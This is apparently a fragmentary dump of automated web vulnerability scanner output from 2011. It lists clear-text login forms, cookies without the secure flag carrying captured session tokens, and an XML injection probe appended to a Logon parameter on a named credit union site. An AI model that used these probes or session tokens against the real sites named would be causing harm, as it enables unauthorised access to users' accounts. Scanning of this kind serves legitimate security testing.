<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <link rel="alternate" type="application/rss+xml" title="Japan ...[SNIP]... <div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">
GET / HTTP/1.1 Host: ipboard-software.software.informer.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Thu, 03 Feb 2011 01:02:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=kvc2qv4jlhknajb7ks0pmmn6m3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 17619
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://commerce.wsj.com/auth/submitlogin
The form contains the following password field:
password
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1 Host: www.boston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.care2.com/passport/login.html
The form contains the following password field:
password
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <br />
GET /latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html HTTP/1.1 Host: www.enewspf.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:06:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: 15ec327c47efbc617f0bc517ff137074=lencdd7511juth6361pib24dj1; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ja_teline_iii_tpl=ja_teline_iii; expires=Tue, 24-Jan-2012 01:06:40 GMT; path=/ Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:06:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69019
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sipc.org/claim/module/login.cfm
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: www.sipc.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:20:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
The Logon parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the Logon parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
Request
GET /cgi-bin/ifsewwwc?Logon]]>> HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/profile HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:29 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aU0Uk5nb5BA_Am808J14jE7JicB888mFkpQFBOHW4JYjU67MKveNZkehKvObze9qKFzCmSjrSPuMVPowkxO7gkmwcbxJO5vw5voNOGNMwvOb%7EUJbx6tCSy_bCnSrKzQGVdPcombRzPLEb9g0nCkkD_%7EWJwqKHVA%7EW0; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile RNT-Time: D=102168 t=1296691469895303 RNT-Machine: 03 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/profile/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:27 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUUNxzJjI%7EEBBcQah8ZuwLUiAJYt0CDud3iF0cvFeI9vUWGePzobuVG_g26Zd6hlHghKzIa6jlESqhi9bh9eUCYd1RS2Olmn8B0SSTRuJV7Ab11fy1nnjbaf605DUDPlrkyJmQs5j2lPWqGZGdDIhTPsS399%7E9JSX3; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fprofile RNT-Time: D=130796 t=1296691467555198 RNT-Machine: 02 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/questions/list HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:24 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUCQuHT%7ERTFnFfe9AXmXRmwPEpTRddWqH%7EauwR6NFwF6Mv19DYjRyhdQ5pDpU347NzekN_qOS6_OSJPu7dwUlwam9Nw2lC2NuUqwf8H%7E7KefSYEeS8SWsrSWFhsYOMj11Q2CuTQDql8q8XVjY77HyXUGPh%7ErJ9dsJY; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist RNT-Time: D=110262 t=1296691464482053 RNT-Machine: 01 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/account/questions/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:22 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUB%7ESjbLwJtIVsNpyw2yYnPiUVp9oatiKCB5e7w4_RWj6PX1MfyBMOQZZV2qvNWwFEb02ybhpf2AczDWcrpXyZh6g8_UqfalUo6SU5z4X78ODb7yf3m7dPKXBUt5vEse2QyYfsLtvbjJTwqYnE8k2JplQ7KAfAkNfT; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/account%252Fquestions%252Flist RNT-Time: D=105998 t=1296691462944248 RNT-Machine: 02 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/docs HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:08 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUuAdP_4HjJaEE4b%7E7X4pORI8c8XeBMU6w1fivQgVK50XUIlnW6xgpSoTaD9T5Sa2vcbft3fkW9vUAHOODRPrmi1d_oUeFuF8d215NaHAEJ9KJKI7zOAM4wuNlEtYix3x2z8D4fynI8hhabhhtifNK10gaE7AmfFA0; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs RNT-Time: D=98256 t=1296691448735268 RNT-Machine: 05 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/docs/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:01 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUpsd4YvJ5WQzq15S7q5tqkwfZH5ARFTzifu9H7kUEy7J2l05kN1pvoqfUmrLHTD8Xeni3Q88n9EmcZ2e_tFs_3LPC25pvIgiKBzgjpIDGf34_jh6r%7EZakRAXln5kOiRl1TXEdmhsfK7Usex_dWYzDVQosUABjHDNp; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Fdocs RNT-Time: D=105949 t=1296691441126003 RNT-Machine: 04 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/list HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:04:03 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUAlcQ2aPfIhdh2rnPJX1dNfzNT3Zj79Cv2ZjySVBKD7IBypHcc7qe2jlZAZvpnBgm6kcgv6j1nUR3NKxMrwSp8yNVTcVuO4InnJaTwq3JaCL_xNNSeYru_O64XonEYrdXjQqw_z9qC_Dk0u6IybsFxfQY1k20J_pC; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist RNT-Time: D=107230 t=1296691443459774 RNT-Machine: 03 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/answers/list/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 302 Moved Temporarily Date: Thu, 03 Feb 2011 00:03:56 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Set-Cookie: cp_session=aUGhL18AeEaT6Z%7EDIuvJlBq0A9oVLf5YqKK5hDthKUl1P4RVzd63RzFCyjego6VqN1FgEm2%7Ej8LURXaTIf2gcB429lSwFnCSqGYvqwy4bUILnbHKw5Lh0OGHmZb6CflO0vrO3UwFGQqctz82dTg_YGC7NQ67Y44S6k; path=/; httponly Location: https://arbor.custhelp.com/app/utils/login_form/redirect/answers%252Flist RNT-Time: D=125101 t=1296691436633614 RNT-Machine: 08 F5_do_compression: yes Content-Length: 0 Content-Type: text/html; charset=UTF-8 Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/home HTTP/1.1 Host: arbor.custhelp.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:36:24 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUPRnPaTZdkIhBi59G5hvxncx_kJa2b_xWToVCDbB35oFkkjhOfFooBkvU99%7EWw%7ELvUGgTe738XUujxie0uHpb9BuUEUDYMNp1Oh_dJo6Jx%7EIpWz_rHWApAwgIlsVp76eHy6TjF1PoyG%7EnGXSIaeapXcDHDERK56hz; path=/; httponly RNT-Time: D=190304 t=1296689784733053 RNT-Machine: 01 F5_do_compression: yes Keep-Alive: timeout=15, max=40 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 22922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/ipreaddress HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:36 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aU4YiZt0HzA%7EV3KX5r1TJz3XkyVV7spmoCXP7Bl0HtJNRb80KnaJwwhvnKgvOLI6sksa%7EMj9Lhj6UyT6M1EJJc2nff5tBBrJ5C6Oc2gE3XdFdL1aLgf6lLTXnUah%7EuEsyspXOwDB8mzueTf1nIZTtYmCgWIgJHyra_; path=/; httponly Content-Length: 26531 RNT-Time: D=98619 t=1296691416912311 RNT-Machine: 02 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /app/utils/account_assistance HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:34 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUSf2lTIfZqUhFbsYQsfqk1hHQmNSnWOiMBpzvtqNtH0tK4CI%7EMeW5n_sslngXWMTm1Y09v7ffr8O9l22cVoIBTZHYNX4H_%7Ef3qan5VXGN6_KDNksCFME8_z6dv0lDtf04f6pgA_0%7ENHbiF2pDNKQ9my8hufrUSvYV; path=/; httponly Content-Length: 25523 RNT-Time: D=109651 t=1296691414433832 RNT-Machine: 04 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" style ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
